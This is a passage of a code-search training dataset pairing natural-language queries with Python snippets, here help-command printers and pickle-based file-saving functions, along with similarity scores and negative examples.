spawn'))\n print(\"{} {} {}\".format('save ', '|', 'Save current player progress'))\n print(\"{} {} {}\".format('load ', '|', 'Load a previous character'))", "def DoHelp(options, args):\n __pychecker__ = 'unusednames=options'\n if len(args) == 1 and args[0] in COMMAND_USAGE_TEXT:\n print(COMMAND_USAGE_TEXT[args[0]])\n else:\n raise gclient_utils.Error(\"unknown subcommand '%s'; see 'gclient help'\" %\n args[0])", "def help(update, context):\n update.message.reply_text(\"\"\"THESE ARE THE COMMANDS\n /hi\n /gokul\n /bala\n /competition\n /form\n \"\"\")", "async def help(ctx, command:str=None):\n if command == None:\n embed = assemble_embed(\n title=\"Looking for help?\",\n desc=(\"Hey there, I'm a resident bot of Scioly.org!\\n\\n\" +\n \"On Discord, you can send me commands using `!` before the command name, and I will process it to help you! \" +\n \"For example, `!states`, `!events`, and `!fish` are all valid commands that can be used!\\n\\n\" +\n \"If you want to see some commands that you can use on me, just type `!list`! 
\" +\n \"If you need more help, please feel free to reach out to a staff member!\")\n )\n return await ctx.send(embed=embed)\n hlp = await get_help(ctx, command)\n await ctx.send(embed=hlp)", "def channel_help(message):\n message.reply(Strings['HELP'].format(config.HELP_URL))", "def do_help(self, arg):\n\t\tif arg:\n\t\t\tfuncarg = arg.replace(\" \", \"_\")\n\t\t\ttry:\n\t\t\t\tfunc = getattr(self, 'help_' + funcarg)\n\t\t\texcept AttributeError:\n\t\t\t\ttry:\n\t\t\t\t\tdoc=getattr(self, 'do_' + funcarg).__doc__\n\t\t\t\t\tif doc:\n\t\t\t\t\t\t\tself.stdout.write(\"%s\\n\"%str(doc))\n\t\t\t\t\t\t\treturn\n\t\t\t\texcept AttributeError:\n\t\t\t\t\tpass\n\t\t\t\tself.stdout.write(\"%s\\n\"%str(self.nohelp % (arg,)))\n\t\t\t\treturn\n\t\t\tfunc()\n\t\telse:\n\t\t\tprint \"\\nAvailable commands (type help <topic> for help on topic):\\n\"\n\t\t\tnames = self.get_names()\n\t\t\tfor name in sorted(names):\n\t\t\t\tif name[:3] == \"do_\":\n\t\t\t\t\tname = name[3:]\n\t\t\t\t\tif name == \"EOF\":\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tself.parent.printHelpLine(name, \"\", getattr(self, \"do_\" + name).__doc__ or \"\")\n\t\t\tprint \"\"", "def showHelp(self):\n\t\tfor i in range(0,20):\n\t\t\tprint \"\"\n\t\tprint \" _ _ \"\n\t\tprint \"| | | | \"\n\t\tprint \"| |__ _ __ ___ | |__ \"\n\t\tprint \"| '_ \\ | '_ \\ / __|| '_ \\ \"\n\t\tprint \"| | | || | | |\\__ \\| | | |\"\n\t\tprint \"|_| |_||_| |_||___/|_| |_|\"\n\t\tprint \"A program by Scott Jackson\"\n\t\tprint \"\"\n\t\tprint \"To enter a command, type the key and press Return.\"\n\t\tprint \"NB: parentheses indicate which of two options is the default.\"\n\t\tprint \"\"\n\t\tprint \"Basic Commands:\"\n\t\tprint \"j / k -- show lower-ranked / higher-ranked stories.\"\n\t\tprint \"r -- get the latest stories from Hacker News.\"\n\t\tprint \"q -- quit.\"\n\t\tprint \"# -- open story number # in your web browser.\"\n\t\tprint \"c# -- open comments for story number # in your web browser.\"\n\t\tprint \"#+ -- open up story number # AND its comments in your web browser.\"\n\t\tprint \"top / new -- switch between showing the top and newest stories on HN. (top)\"\n\t\tprint \"c / e -- collapse stories you've already read / don't collapse them. (e)\"\n\t\tprint \"u -- update hnsh to the latest version.\"\n\t\tprint \"==========================\"\n\t\tprint \"For more commands, see the man.txt file.\"\n\t\tinput = raw_input(\"Press Return to go back to the Hacker News stories.\")", "def more_informations():\n print \"--help for more informations.\"\n sys.exit(1)", "def CommandHelp(paser):\n\n\tprint \"\\n===============Commands List===============\\n\"\n\t\t\n\tprint \"NewProject - {}\".format(NewProject.__doc__)\n\tprint \"DelProject - {}\".format(DelProject.__doc__)\n\tprint \"ShareProject - {}\".format(ShareProject.__doc__)\n\tprint \"StopProject - {}\".format(StopProject.__doc__)\n\tprint \"Help - {}\".format(CommandHelp.__doc__)\n\tprint \"Exit - Finaliza la sesion en la terminal.\"", "def help_command(update: Update, context: CallbackContext) -> None:\n commands = [\"/login <pwd>\\n\",\n \"/status\\n\",\n \"/heat\\n\",\n \"/temp\\n\",\n \"/off\\n\",\n \"/help\\n\",\n \"/set\\n\",\n \"/unset\\n\",\n \"/heatmore\\n\",\n \"/lighton\\n\",\n \"/lightoff\\n\"]\n\n cmd: str = \" \".join(commands)\n update.message.reply_text('commands are:\\n' + cmd)", "def help():\n return statement(help_text)" ]
[ "0.84459895", "0.81877965", "0.81058455", "0.8060183", "0.80382925", "0.803564", "0.7979417", "0.79499114", "0.79247713", "0.79205954", "0.7903753", "0.7890884", "0.7862196", "0.78568035", "0.7844785", "0.78190106", "0.78190106", "0.77970946", "0.77970946", "0.7784749", "0.7760896", "0.77318525", "0.77285266", "0.7727433", "0.77265805", "0.7683609", "0.7667311", "0.7646955", "0.7614347", "0.7612728", "0.75966346", "0.7581593", "0.7577692", "0.7577692", "0.7572426", "0.75653255", "0.75653255", "0.75653255", "0.75653255", "0.756396", "0.75449127", "0.75311625", "0.7525225", "0.7519658", "0.7516538", "0.75124586", "0.7504183", "0.74994963", "0.74739295", "0.7470314", "0.74689704", "0.7466509", "0.7462467", "0.74598455", "0.74544287", "0.7453879", "0.74479777", "0.7443314", "0.7441935", "0.7438914", "0.7434473", "0.74256635", "0.7398089", "0.739702", "0.739702", "0.7369509", "0.7364543", "0.7363899", "0.73567545", "0.7345411", "0.7341273", "0.7316813", "0.7313173", "0.73117816", "0.73106086", "0.7300159", "0.7294036", "0.72884285", "0.72884285", "0.72884285", "0.72884285", "0.72780025", "0.7276247", "0.7273482", "0.72729075", "0.7272734", "0.7265219", "0.7261052", "0.72573024", "0.7256481", "0.72552156", "0.72530943", "0.7251562", "0.7244723", "0.72393715", "0.72393614", "0.7233769", "0.7228423", "0.72272223", "0.7217316", "0.7217257" ]
0.0
-1
Red = Disable
Blue = Enable
Any problem such as plugins on dashboard is enable but show disable here, info Owner
async def plugin(self,ctx):
    special_case = {"Anime":"myanimelist","Anti Raid":"antiraid"}
    plugin_setting = await self.redis.hgetall("{}:Config:Cogs".format(ctx.message.guild.id))
    embed = discord.Embed()
    cogs = self.bot.cogs.keys()
    for x in cogs:
        setting = u"\U0001F534" #red
        if x in ("Core", "Remindme", "Tools", "REPL","Events"): # A Owner's thing only.
            if ctx.message.author.id != self.bot.owner.id:
                continue
            setting = u"\U0001F535" #blue
        if x.lower() in plugin_setting or special_case.get(x) in plugin_setting:
            setting = u"\U0001F535" #blue
        embed.add_field(name = x,value = setting)
    if ctx.message.guild.me.colour.value:
        embed.colour = ctx.message.guild.me.colour
    embed.set_footer(text = "{} = Disable | {} = Enable".format(u"\U0001F534",u"\U0001F535"))
    await ctx.send(embed=embed)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_enabled(self):", "def check_disabled(self):\n return None", "def get_status(self):\n return super(Cabling, self).get_status()", "def enable(self):", "def Enabled(self) -> bool:", "def disable(self):", "def isEnabled(self):", "def disable_feature(self,reason,source=\"gff3_maniger\"):\r\n date = datetime.datetime.now().strftime(\"%Y-%m-%d\")\r\n self.add_history(date,source,reason)\r\n self.active = False\r\n if self._owner_line.type == 'SNP':\r\n self._owner_line._owner_set.all_snp_disabled()", "async def cog_check(self, ctx):\n guild_doc = await db.PLUGINS.find_one({\"_id\": ctx.guild.id})\n\n if guild_doc.get(\"Verification\"):\n return True\n\n else:\n await ctx.send(\n embed=discord.Embed(\n description=(\n f\"{var.E_DISABLE} The Verification plugin\"\n \" is disabled in this server\"\n ),\n color=var.C_ORANGE\n )\n )", "def enable(self) -> None:", "def disable(ctx):\n config_db = ConfigDBConnector()\n config_db.connect()\n config_db.mod_entry(\"NAT_GLOBAL\", \"Values\", {\"admin_mode\": \"disabled\"})", "def disability_specify(self, instance):\r\n return instance.user.profile.disability_specify", "def disable():\n boutonPierre[\"state\"] = \"disabled\"\n boutonFeuille[\"state\"] = \"disabled\"\n boutonCiseaux[\"state\"] = \"disabled\"", "def check_enable_mode(self, *args, **kwargs):\n pass", "def setEnabled(*args):", "def setEnabled(*args):", "def setEnabled(*args):", "def setEnabled(*args):", "def setEnabled(*args):", "def setEnabled(*args):", "def setEnabled(*args):", "def setEnabled(*args):", "def setEnabled(*args):", "def setEnabled(*args):", "def setEnabled(*args):", "def get_everyone_denied(self):", "def enable():\n boutonPierre[\"state\"] = \"normal\"\n boutonFeuille[\"state\"] = \"normal\"\n boutonCiseaux[\"state\"] = \"normal\"", "def disable(self) -> None:", "def disable():\n configdb = ConfigDBConnector()\n configdb.connect()\n rif_info = {}\n rif_info['FLEX_COUNTER_STATUS'] = 'disable'\n configdb.mod_entry(\"FLEX_COUNTER_TABLE\", \"RIF\", rif_info)", "def disabled(name):\n return not enabled(name)", "async def toggle(self, ctx: BBContext):\n\n self.code_enabled = not self.code_enabled\n e = 'enabled.' 
if self.code_enabled else 'disabled.'\n await ctx.send(f\"Bunker code auto reaction has been : **{e}**\")\n self.bot.logger.info('Bunker code listener %s by %s', e, str(ctx.author))", "def enable(self):\n pass", "def isEnabled(self) -> bool:\n ...", "def _isdisable(self):\n return self.dp.state()==PyTango.DevState.DISABLE", "def can_be_disabled(self) -> bool:\n return True", "async def _antiadv(self, ctx):\r\n serverid = ctx.message.server.id\r\n if ctx.invoked_subcommand is None:\r\n await send_cmd_help(ctx)\r\n if serverid not in self.adkillr:\r\n self.adkillr[serverid] = {'toggle': False, 'message': '{0.mention} don\\'t send links!', 'filters': []}\r\n dataIO.save_json(\"data/adkillr/adkillr.json\", self.adkillr)", "def enableVocolaTakesUnimacroActions(self):\n key = \"VocolaTakesUnimacroActions\"\n self.userregnl.set(key, 1)", "async def admin_disable(self, ctx: commands.Context):\n if ctx.guild.id not in self.guilds:\n await ctx.send('Team management is already disabled in this guild.')\n return\n await self._disable_guild(guild=ctx.guild)\n await ctx.send('Team management disabled.')", "def disable(self):\n pass", "def disable(ctx):\n\n fc_group_cfg = {}\n fc_group_cfg['FLEX_COUNTER_STATUS'] = DISABLE\n ctx.obj.mod_entry(\"FLEX_COUNTER_TABLE\", ACL, fc_group_cfg)", "def disable():\n configdb = ConfigDBConnector()\n configdb.connect()\n tunnel_info = {}\n tunnel_info['FLEX_COUNTER_STATUS'] = DISABLE\n configdb.mod_entry(\"FLEX_COUNTER_TABLE\", \"TUNNEL\", tunnel_info)", "def status():\n with spinner():\n is_enabled = is_witness_enabled()\n signing_key = current_signing_key()\n misses = total_missed()\n\n t = PrettyTable([\"Enabled\", \"Misses\", \"Key\"])\n t.align = \"l\"\n t.add_row([is_enabled, misses, signing_key])\n\n output(t, 'Status')\n output(get_config(), 'Configuration')", "def check_enable_mode(self, check_string='#'):\n return True", "def check_if_enabled(self, user):\n\t\tfrom webnotes.utils import cint\n\t\tif user=='Administrator': return\n\t\tif not cint(webnotes.conn.get_value('Profile', user, 'enabled')):\n\t\t\tself.fail('User disabled or missing')", "def affection_status_switch_on(self):\n self._affection_status_switch = False", "def disable():\n configdb = ConfigDBConnector()\n configdb.connect()\n fc_info = {}\n fc_info['FLEX_COUNTER_STATUS'] = 'disable'\n configdb.mod_entry(\"FLEX_COUNTER_TABLE\", \"QUEUE_WATERMARK\", fc_info)\n configdb.mod_entry(\"FLEX_COUNTER_TABLE\", \"PG_WATERMARK\", fc_info)\n configdb.mod_entry(\"FLEX_COUNTER_TABLE\", BUFFER_POOL_WATERMARK, fc_info)", "def disableVocolaTakesUnimacroActions(self):\n key = \"VocolaTakesUnimacroActions\"\n self.userregnl.set(key, 0)", "def enable(ctx):\n\n config_db = ConfigDBConnector()\n config_db.connect()\n config_db.mod_entry(\"NAT_GLOBAL\", \"Values\", {\"admin_mode\": \"enabled\"})", "def organization_enable_status(self) -> str:\n return pulumi.get(self, \"organization_enable_status\")", "def ha_status_icon_should_appear_and_it_should_reflect_that_ha_is_enabled_when_clicked(driver):\n wait_on_element(driver, 0.5, 5, '//button[@ix-auto=\"button__haStatus\"]')\n driver.find_element_by_xpath('//button[@ix-auto=\"button__haStatus\"]').click()\n wait_on_element(driver, 0.5, 5, '//h1[contains(.,\"HA Enabled)]')\n driver.find_element_by_xpath('//span[contains(.,\"HA is enabled\")]')\n driver.find_element_by_xpath('//button[@ix-auto=\"button__CLOSE\"]').click()", "def check_disabled(self):\n if self._treat_counter % 6 != 0:\n return\n if not self.site.logged_in():\n self.site.login()\n page = 
pywikibot.Page(\n self.site,\n 'User:{username}/shutoff/{class_name}'.format(\n username=self.site.user(), class_name=self.__class__.__name__\n ),\n )\n if page.exists():\n content = page.get(force=True).strip()\n if content:\n e = '{} disabled:\\n{}'.format(self.__class__.__name__, content)\n pywikibot.error(e)\n self.quit()", "def test_verification_status_invisible(self):\r\n self.client.login(username=\"jack\", password=\"test\")\r\n self.check_verification_status_off('verified', 'You\\'re enrolled as a verified student')\r\n self.check_verification_status_off('honor', 'You\\'re enrolled as an honor code student')\r\n self.check_verification_status_off('audit', 'You\\'re auditing this course')", "def setDisabledColor(*args):", "def setDisabledColor(*args):", "def test_get_current_component_status_DISABLED(self):\n self._ucr({\n 'repository/online/component/a': 'no',\n })\n ORIG = UU.FN_UPDATER_APTSOURCES_COMPONENT\n try:\n tmp = NamedTemporaryFile()\n UU.FN_UPDATER_APTSOURCES_COMPONENT = tmp.name\n self.assertEqual(UU.COMPONENT_DISABLED, self.u.get_current_component_status('a'))\n finally:\n UU.FN_UPDATER_APTSOURCES_COMPONENT = ORIG\n tmp.close()", "def get_status():\n return ('off', 'off')", "def toggled_comunication(self):\n if self.actionPC_Monitor.isChecked() and self.actionPC_Monitor.isEnabled():\n self.actionPC_Monitor.setEnabled(0)\n self.actionPC_Sensor_Actuador.setChecked(0)\n self.actionPC_Sensor_Actuador.setEnabled(1)\n self.monitor_environment()\n \n elif self.actionPC_Sensor_Actuador.isChecked() and self.actionPC_Sensor_Actuador.isEnabled():\n self.actionPC_Sensor_Actuador.setEnabled(0)\n self.actionPC_Monitor.setChecked(0)\n self.actionPC_Monitor.setEnabled(1)\n self.actuator_environment()", "def test_listWithDisabled(self):\n self.userbase('create', 'alice', 'localhost', SECRET)\n self.userbase('create', 'bob', 'localhost', SECRET)\n\n def cb(xxx_todo_changeme2):\n (interface, avatar, logout) = xxx_todo_changeme2\n avatar.disabled = 1\n output = self.userbase('list')\n self.assertEqual(output,\n ['alice@localhost', 'bob@localhost [DISABLED]'])\n\n return self._login('bob@localhost', SECRET).addCallback(cb)", "def disableButtons(self):\n self.ui.b_run.setEnabled(False)\n self.ui.b_colour.setEnabled(False)\n self.ui.b_ground_truth.setEnabled(False)\n self.ui.b_vid.setEnabled(False)\n self.ui.b_save.setEnabled(False)\n self.ui.t_low.setEnabled(False)\n self.ui.t_high.setEnabled(False)\n self.ui.t_fps.setEnabled(False)\n self.ui.combo_superpixel.setEnabled(False)\n self.ui.c_super_pixel_video.setEnabled(False)\n self.ui.c_csv.setEnabled(False)\n self.ui.c_draw.setEnabled(False)\n self.ui.c_velocity.setEnabled(False)\n self.ui.c_of.setEnabled(False)\n self.ui.c_back_of.setEnabled(False)\n self.ui.c_depth.setEnabled(False)\n self.ui.c_speed_plot.setEnabled(False)\n self.ui.c_error_plot.setEnabled(False)\n self.ui.c_crash_plot.setEnabled(False)\n self.ui.c_error_plot_video.setEnabled(False)\n self.ui.c_speed_plot_video.setEnabled(False)\n self.ui.c_crash_plot_video.setEnabled(False)\n self.ui.c_optimize.setEnabled(False)\n self.ui.c_object_detection.setEnabled(False)", "async def enable(self, ctx):\n self.bot.db.execute(\"UPDATE starboards SET enabled = 1 WHERE channel_id = ?\", (ctx.channel.id,))\n await ctx.say(\"star.enabled\")", "def _get_enable(self):\n return self.__enable", "def _get_enable(self):\n return self.__enable", "def custom_assess_status_check(self):\n options = self.options\n # can check options.thing to ensure that it makes sense\n # if wrong return 'blocked', 
\"The driver is badly configured ...\"\n return None, None", "def admin_non_activated(request):\r\n ret = []\r\n res = UserMgr.non_activated_account()\r\n if res:\r\n ret = [u.username for u in res]\r\n\r\n return _api_response(request, {\r\n 'count': len(ret),\r\n 'status': True,\r\n 'data': ret,\r\n })", "def _iotool_enable_yellow_command(self):\n return self._iotool.commands.set_low(self._spconfig.IOTOOL_GREEN_YELLOW_SWITCH_PIN)", "def test_enabled(self):\n # OSA script should have been installed in setUp function, which sets\n # enabled to True by default.\n self.assertTrue(self.run_function(\"assistive.enabled\", [OSA_SCRIPT]))\n # Disable OSA Script\n self.run_function(\"assistive.enable\", [OSA_SCRIPT, False])\n # Assert against new disabled status\n self.assertFalse(self.run_function(\"assistive.enabled\", [OSA_SCRIPT]))", "def styled_status(enabled, bold=True):\n return click.style('Enabled' if enabled else 'Disabled', 'green' if enabled else 'red', bold=bold)", "def enabled(self):\n raise NotImplementedError", "def _disable(self):\n self.enabled = False", "def disable():\n request = dict(id='gbn')\n _gbn_disable(request)", "async def goodbye_toggle(self, ctx, value: bool):\n await queries.update_setting(ctx, \"goodbye_settings\", \"is_enabled\", value)\n if value:\n await util.send_success(ctx, \"Goodbye messages are now **enabled**\")\n else:\n await util.send_success(ctx, \"Goodbye messages are now **disabled**\")", "async def toggle(self, ctx):\r\n serverid = ctx.message.server.id\r\n if self.adkillr[serverid]['toggle'] is True:\r\n self.adkillr[serverid]['toggle'] = False\r\n e = discord.Embed(description='**AntiAdv is now disabled.**')\r\n await self.bot.say(embed=e)\r\n elif self.adkillr[serverid]['toggle'] is False:\r\n self.adkillr[serverid]['toggle'] = True\r\n e = discord.Embed(description='**AntiAdv is now enabled.**')\r\n await self.bot.say(embed=e)\r\n dataIO.save_json(\"data/adkillr/adkillr.json\", self.adkillr)", "def disable(self) -> Awaitable[Dict]:\n return self.client.send(\"Security.disable\", {})", "def __disable__(self) -> None:\n pass", "def disabled_by_microsoft(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"disabled_by_microsoft\")", "def get_id(self):\n return \"always_false_plugin\"", "def disable_dialog_boxes(self):\n self.exec_command('SilentUpdateFW')\n self.exec_command('SuppressInfoUpdateFW')\n self.exec_command('SetBatchMode = 1')\n\n # SuppressControlPanel\n self.exec_command(\"HideDeviceSelection = 1\")\n self.exec_command(\"SuppressControlPanel\")\n # Hide Flash Windows\n self.exec_command(\"DisableInfoWinFlashDL\")\n self.exec_command(\"DisableInfoWinFlashBPs\")", "def enable_btns(self):\n self.saveBtn.setEnabled(True)\n self.openVideoBtn.setEnabled(True)\n self.openAnnotationBtn.setEnabled(True)\n self.resetBtn.setEnabled(True)\n self.speedCombo.setEnabled(True)\n self.newFileBtn.setEnabled(True)\n self.HelpBtn.setEnabled(True)", "def enable(self):\n if not self.labExperiment:\n super().enable()\n else:\n self.connection.command('open_dm', self.DMserial)\n status = self.connection.query('get_status')\n assert status == 0, 'Error connecting to DM. 
Error: ' + str(status)\n numActProfile = self.connection.query('num_actuators')\n assert numActProfile == self.numActProfile, 'Wrong number of profile actuators entered'\n print(\"'BM1k' is now enabled\")", "def disable(self):\n\t\tresponse = self.client.post(self._endpoint + \"/disable\")\n\t\treturn bool(response.json[\"success\"])", "def test_disable(self):\n self.assertTrue(self.user1.active)\n self.assertFalse(self.user1.ad_deleted)\n url = '/api/users/{}/'.format(self.user1.ad_guid)\n data = {\n 'Enabled': False,\n }\n response = self.client.put(url, json.dumps(data), content_type='application/json')\n self.assertEqual(response.status_code, 202)\n user = DepartmentUser.objects.get(pk=self.user1.pk) # Refresh from db\n self.assertFalse(user.ad_deleted)\n self.assertFalse(user.active)\n self.assertTrue(user.in_sync)", "def change_log_success_status(self, value):\n if value:\n self.embed.colour = 3066993 # Discord color format\n elif value is False:\n self.embed.colour = 15158332\n elif not value:\n self.embed.colour = 15105570", "def add_option_enable(self):\n logger.debug(\"Adding enable option\")\n chkenable = ttk.Checkbutton(self.optsframe,\n variable=self.vars[\"enabled\"],\n text=\"Enable {}\".format(self.tabname),\n command=self.on_chkenable_change)\n chkenable.pack(side=tk.RIGHT, padx=5, anchor=tk.W)\n Tooltip(chkenable,\n text=\"Enable or disable {} display\".format(self.tabname),\n wraplength=200)", "def disable():\n configdb = ConfigDBConnector()\n configdb.connect()\n port_info = {}\n port_info['FLEX_COUNTER_STATUS'] = 'disable'\n configdb.mod_entry(\"FLEX_COUNTER_TABLE\", \"PORT\", port_info)", "def test_disabled_feature(self):\r\n user = UserFactory()\r\n staff = AdminFactory()\r\n\r\n # if feature is disabled user can keep reusing same password\r\n self.assertTrue(PasswordHistory.is_allowable_password_reuse(user, \"test\"))\r\n self.assertTrue(PasswordHistory.is_allowable_password_reuse(staff, \"test\"))\r\n\r\n self.assertFalse(PasswordHistory.should_user_reset_password_now(user))\r\n self.assertFalse(PasswordHistory.should_user_reset_password_now(staff))", "def disable_setup(self):\n self.high_ver_entry.config(state=\"disabled\")\n self.low_ver_entry.config(state=\"disabled\")\n self.left_hor_entry.config(state=\"disabled\")\n self.right_hor_entry.config(state=\"disabled\")", "def _iotool_enable_green_command(self):\n return self._iotool.commands.set_high(self._spconfig.IOTOOL_GREEN_YELLOW_SWITCH_PIN)", "def is_enabled(self):\n enabled = self.settings.get('show_status_bar_text', False)\n if self.template and not enabled:\n self.template = None\n self.vars['repo'] = None\n self.erase()\n return enabled", "async def disable(self, ctx):\n\n server = ctx.message.server\n\n settings = self.bot.dota_ticker_settings.get(server.id)\n\n if settings is not None:\n settings['enabled'] = False\n await self.bot.dota_ticker_settings.put(server.id, settings)\n\n await self.bot.say('The match ticker has been disabled on {0.name}.'.format(server))", "def disabled(username):\r\n msg = u\"{0} is a disabled user account\".format(username)\r\n\r\n data = {\r\n 'user': username,\r\n 'component': AuthLog.component\r\n }\r\n\r\n AuthLog.store(Log.INFO, msg, **data)", "def enabled(self):\n return True", "def enabled(self):\n return True", "async def active(self, ctx: commands.Context, toggle: bool = None):\n guild = ctx.guild\n tog = self.config.guild(guild)\n role_config = [\n await tog.temprole(),\n await tog.autoroles(),\n ]\n if not role_config[1]:\n role_config[1] = None\n if toggle is 
None:\n message = \"The Verification settings is set to {}.\".format(await tog.toggle())\n if role_config.count(None) == 2 and await tog.toggle():\n await tog.toggle.set(False)\n message = (\n \"I have disabled verification since roles instructions has been \"\n \"removed. Check settings for more informations\"\n )\n return await ctx.send(message)\n\n if role_config.count(None) == 2:\n return await ctx.send(\n \"I am missing informations; I don't know if I should either give a temprorary \"\n \"role while verifying or give a role after the verification.\"\n )\n await tog.toggle.set(toggle)\n await ctx.send(\"Verification settings is now set to {choice}.\".format(choice=toggle))", "async def admin_enable(self, ctx: commands.Context):\n if ctx.guild.id in self.guilds:\n await ctx.send('Team management is already enabled in this guild.')\n return\n await self._enable_guild(guild=ctx.guild)\n await ctx.send('Team management enabled.')", "def fact():\n status = \"disabled\"\n pref = CFPreferencesCopyAppValue(\n \"AutomaticCheckEnabled\", \"/Library/Preferences/com.apple.SoftwareUpdate\"\n )\n if pref:\n status = \"enabled\"\n\n return {factoid: status}", "def disable(self): \n self.feed_button.config(state=\"disabled\")\n self.eat_button.config(state=\"disabled\") \n for t in range(self.player.game.trait_limit): \n self.add_trait_buttons[t].config(state=\"disabled\") \n self.add_population_button.config(state=\"disabled\")\n self.add_body_size_button.config(state=\"disabled\")", "def toggle_failed_banner_off(request):\r\n user_id = request.user.id\r\n SoftwareSecurePhotoVerification.display_off(user_id)\r\n return HttpResponse('Success')", "async def toggle(self, ctx):\n guild = ctx.message.guild\n\n enabled = await self.config.guild(guild).enabled()\n\n enabled = not enabled\n await self.config.guild(guild).enabled.set(enabled)\n\n if enabled is True:\n await ctx.send(\"AntiSpam has been enabled\")\n else:\n await ctx.send(\"AntiSpam has been disabled\")", "def _get_admin_status(self):\n return self.__admin_status", "def disable_color(self):\n self.disable_color = True" ]
[ "0.64461994", "0.61870736", "0.6155342", "0.606294", "0.60158396", "0.59407747", "0.5909308", "0.5869749", "0.5851598", "0.58354104", "0.5772434", "0.5748269", "0.574007", "0.5675615", "0.5668143", "0.5668143", "0.5668143", "0.5668143", "0.5668143", "0.5668143", "0.5668143", "0.5668143", "0.5668143", "0.5668143", "0.5668143", "0.56668574", "0.56544757", "0.5642185", "0.56349945", "0.55991596", "0.55842316", "0.55806315", "0.55688715", "0.5526911", "0.5517144", "0.5492399", "0.54842997", "0.546942", "0.5462072", "0.5458034", "0.5420423", "0.54133695", "0.5409734", "0.54094636", "0.5401592", "0.5399459", "0.53950405", "0.5389266", "0.5385976", "0.5376283", "0.53623945", "0.5362315", "0.5360602", "0.5360602", "0.53574705", "0.53508556", "0.53494215", "0.5349183", "0.5340616", "0.5337646", "0.5336186", "0.5336186", "0.53294474", "0.5324071", "0.5316508", "0.53143376", "0.5308128", "0.53059644", "0.5304992", "0.52990156", "0.52943707", "0.5290482", "0.52880156", "0.5286479", "0.52804244", "0.5278929", "0.52674896", "0.5266074", "0.5262645", "0.52546716", "0.5253695", "0.5252237", "0.52518606", "0.5242113", "0.5238136", "0.5237907", "0.52341616", "0.523326", "0.52307504", "0.5229827", "0.52198815", "0.52198815", "0.52158785", "0.5211892", "0.52094036", "0.520762", "0.5205642", "0.52001923", "0.5198957", "0.5194029" ]
0.65774465
0
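As an aside on the toggle logic in the document above: stripped of the Discord and Redis dependencies, the red/blue status mapping reduces to a small pure function. A simplified, runnable sketch — the cog names, settings keys, and the special-case alias below are made-up illustrations, not values from the dataset:

RED, BLUE = "\U0001F534", "\U0001F535"  # disabled / enabled markers

def plugin_status(cogs, enabled_keys, special_case=None):
    # Mirror the lookup in the document above: a cog counts as enabled if its
    # lowercased name, or its special-case alias, appears in the settings hash.
    special_case = special_case or {}
    status = {}
    for cog in cogs:
        enabled = cog.lower() in enabled_keys or special_case.get(cog) in enabled_keys
        status[cog] = BLUE if enabled else RED
    return status

# Illustrative-only cog names and stored keys.
print(plugin_status(["Anime", "Music"], {"myanimelist"}, {"Anime": "myanimelist"}))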
store input into filename using pickle.dump
import pickle

def store(input, filename):
    cout = open(filename, 'wb')  # binary mode is required by pickle on Python 3
    pickle.dump(input, cout)
    cout.close()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def store(self, filename):", "def pickle(self,data,filename):\n pickle.dump(data, open(filename, 'wb'))", "def save_file_data(name, obj, input_path='/inputs'):\n filename = '{}/{}.pkl'.format(input_path, name)\n if not os.path.exists(os.path.dirname(filename)):\n try:\n os.makedirs(os.path.dirname(filename))\n except OSError as exc: # Guard against race condition\n if exc.errno != errno.EEXIST:\n raise\n with open(filename.format(name), 'wb+') as output:\n pickle.dump(obj, output)", "def save(self, output, data):", "def save(data, filename):\r\n with open(filename, 'wb') as fp:\r\n pickle.dump(data, fp)", "def save(self,filename): \n with open(filename, 'wb') as f:\n pickle.dump(self,f)", "def save(self,filename):\n with open(filename,'wb') as f:\n pickle.dump(self,f)", "def save(self, filename):\n pickle.dump(self, open(filename + '.p', 'wb'), 2)", "def store_pickle(fname, info, mode='w'):\n assert fname[-2:] == '.p'\n f = open(fname, mode)\n pickle.dump(info, f)\n f.close()", "def psave(var, filename):\n pickle.dump(var, open(filename, 'wb'))", "def save_object(self, filename, data):\n with open(filename, 'wb') as outp: # Overwrites any existing file.\n pickle.dump(data, outp, pickle.HIGHEST_PROTOCOL)", "def save_as(self, filename):\n assert type(filename) == str, 'ERROR: filename should be type str'\n if '.pkl' in filename:\n with open(filename, 'wb') as f:\n dill.dump(self, f)\n else:\n with open(filename + '.pkl', 'wb') as f:\n dill.dump(self, f)", "def save(fname, data):\r\n with open(fname, 'wb') as f:\r\n pickle.dump(data, f)", "def save(self, filename):\n if '.pkl' not in filename:\n filename = filename + '.pkl'\n with open(filename, 'wb') as f:\n pickle.dump(self, f)", "def save_input(self):\n if not os.path.exists(self.wdir):\n os.makedirs(self.wdir)\n\n with open(self.filepath, \"w\") as f:\n f.write(self.input_string)\n print(f\"-- Input file [{self.filename}] written successfully.\")", "def save_var(filename, data, protocol = -1, allow_dill=False):\n if filename.endswith('.gz') :\n open_method = gzip.open\n else:\n open_method = open\n\n output = open_method(filename, 'wb')\n try:\n # Pickle dictionary using given protocol\n std_pickle.dump(data, output, protocol)\n finally:\n output.close()\n\n return", "def save(self, filename):\n with open(filename, \"wb\") as f:\n pkl.dump(self, f)", "def pickle_data(file_name, data):\n outfile = open(file_name, \"wb\")\n pickle.dump(data, outfile)\n outfile.close()", "def save(self, filename, **kwargs):\n with open(filename, 'wb') as fin:\n pickle.dump(self, fin, **kwargs)", "def save(self,filename):\n f = open(filename, 'wb')\n pickle.dump(self,f)\n f.close()", "def save_pickle(file, path):\n with open(path, 'wb') as f:\n pickle.dump(file, f)\n file_name = re.findall(r\"/?[^/]+\", path)[-1].strip(\"/\")\n print(f\"Stored {file_name}.\")", "def write_pickle_object_to_file(self, inpobj):\n with gzip.open('%s.tmp' % self.pickle_file, 'wb') as pkl_file:\n pickle.dump(inpobj, pkl_file, pickle.HIGHEST_PROTOCOL)\n run_command('mv %s.tmp %s' % (self.pickle_file, self.pickle_file))\n return True", "def save_pickle(filename, data, override=True):\n filename = \"{}.pkl\".format(filename)\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n\n if override == False:\n filename = add_unique_postfix(filename)\n\n with open(filename, \"wb\") as f:\n pickle.dump(data, f)\n\n return filename", "def save(self,fn):\n fn = fn if fn[-4:] == \".pkl\" else fn+\".pkl\"\n with open(fn,\"wb+\") as f:\n pickle.dump(self,f)\n log(\"Saved reader to 
